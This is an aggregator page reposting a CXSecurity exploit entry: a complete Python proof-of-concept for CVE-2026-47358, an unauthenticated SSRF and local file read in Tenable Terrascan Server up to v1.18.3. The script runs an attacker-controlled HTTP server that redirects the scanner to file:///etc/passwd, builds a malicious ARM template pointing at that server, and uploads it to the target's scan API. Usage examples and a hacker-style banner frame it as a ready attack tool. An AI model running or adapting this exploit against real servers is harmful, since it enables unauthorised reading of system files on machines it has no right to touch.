惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

云风的 BLOG
云风的 BLOG
V
Visual Studio Blog
人人都是产品经理
人人都是产品经理
The GitHub Blog
The GitHub Blog
月光博客
月光博客
T
Tailwind CSS Blog
小众软件
小众软件
Y
Y Combinator Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
P
Proofpoint News Feed
B
Blog RSS Feed
博客园 - 司徒正美
A
About on SuperTechFans
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
博客园 - 聂微东
Microsoft Security Blog
Microsoft Security Blog
Recent Announcements
Recent Announcements
博客园 - Franky
U
Unit 42
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Microsoft Azure Blog
Microsoft Azure Blog
T
The Blog of Author Tim Ferriss
GbyAI
GbyAI
Apple Machine Learning Research
Apple Machine Learning Research

CXSECURITY Database RSS Feed - CXSecurity.com

Langflow 1.3.0 Remote Code Execution Krayin CRM v2.2.x Authenticated Remote Code Execution PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 KNX visualisering - Broken Access Control 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision NodeBB <= 4.13.2 ActivityPub attributedTo Local UID Spoof - CXSecurity.com KNX visualisering - Broken Access Control vm2 <= 3.11.3 - NodeVM Builtin Denylist Bypass SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution
Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read
Mohammed Idr · 2026-06-07 · via CXSECURITY Database RSS Feed - CXSecurity.com

Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read

#!/usr/bin/env python3 # Exploit Title: Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read # CVE: CVE-2026-47358 # Date: 2026-05-20 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/tenable/terrascan # Software Link: https://github.com/tenable/terrascan # Affected: Terrascan Server <= v1.18.3 # Tested on: Terrascan v1.18.3 # Category: Remote # Platform: Linux # Exploit Type: SSRF + Local File Read # CVSS: # CWE : CWE-918, CWE-73, CWE-610 # Description: Terrascan server allows unauthenticated SSRF and local file read via external URL resolution in IaC templates using go-getter. # Fixed in: Unfixed (Project Archived) # Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://127.0.0.1:9010 --lhost 192.168.1.100 --lport 8080 # # Options: # # Notes: # # How to Use # # Step 1: print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗ ║ ║ ██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██╗ ║ ║ ██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║ ║ ██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║ ║ ██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ║ ║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ║ ║ ║ ║ [ b a n y a m e r _ s e c u r i t y ] ║ ║ ║ ║ ▸ Silent Hunter | Shadow Presence | Digital Intel ◂ ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer • Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ Exploit : CVE-2026-47358 ║ ║ Target : Tenable Terrascan Server ║ ║ ║ ║ Status : ACTIVE ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import json import time import argparse import os from http.server import HTTPServer, BaseHTTPRequestHandler from threading import Thread TARGET_URL = None ATTACKER_HOST = "0.0.0.0" ATTACKER_PORT = None class TerraformRedirectHandler(BaseHTTPRequestHandler): def do_GET(self): if self.path.endswith("/payload"): self.send_response(200) self.send_header("X-Terraform-Get", "file:///etc/passwd") self.end_headers() self.wfile.write(b"malicious redirect payload") else: self.send_response(200) self.end_headers() self.wfile.write(b"ok") def start_malicious_server(): server = HTTPServer((ATTACKER_HOST, ATTACKER_PORT), TerraformRedirectHandler) print(f"[*] Malicious server listening on {ATTACKER_HOST}:{ATTACKER_PORT}") server.serve_forever() def create_malicious_arm_template(): template = { "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [], "outputs": { "poc": { "type": "string", "value": "CVE-2026-47358 PoC" } }, "templateLink": { "uri": f"http://localhost:{ATTACKER_PORT}/payload" } } with open("malicious_arm.json", "w") as f: json.dump(template, f, indent=2) print("[+] Malicious ARM template created") def upload_to_terrascan(file_path): url = f"{TARGET_URL}/v1/arm/1.0/azure/scan" try: with open(file_path, "rb") as f: files = {"file": (os.path.basename(file_path), f, "application/json")} response = requests.post(url, files=files, timeout=15) print(f"[+] Upload status: {response.status_code}") except Exception as e: print(f"[-] Upload error: {e}") def main(): global TARGET_URL, ATTACKER_PORT parser = argparse.ArgumentParser() parser.add_argument("target", help="Target Terrascan URL (e.g. http://127.0.0.1:9010)") parser.add_argument("--lhost", required=True, help="Your IP for callback") parser.add_argument("--lport", type=int, default=8080, help="Your listening port") args = parser.parse_args() TARGET_URL = args.target.rstrip("/") ATTACKER_PORT = args.lport print("[*] Starting malicious server...") server_thread = Thread(target=start_malicious_server, daemon=True) server_thread.start() time.sleep(2) create_malicious_arm_template() upload_to_terrascan("malicious_arm.json") print("[+] Exploit sent. Check your listener for SSRF activity.") if __name__ == "__main__": main()

References:

https://github.com/tenable/terrascan




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}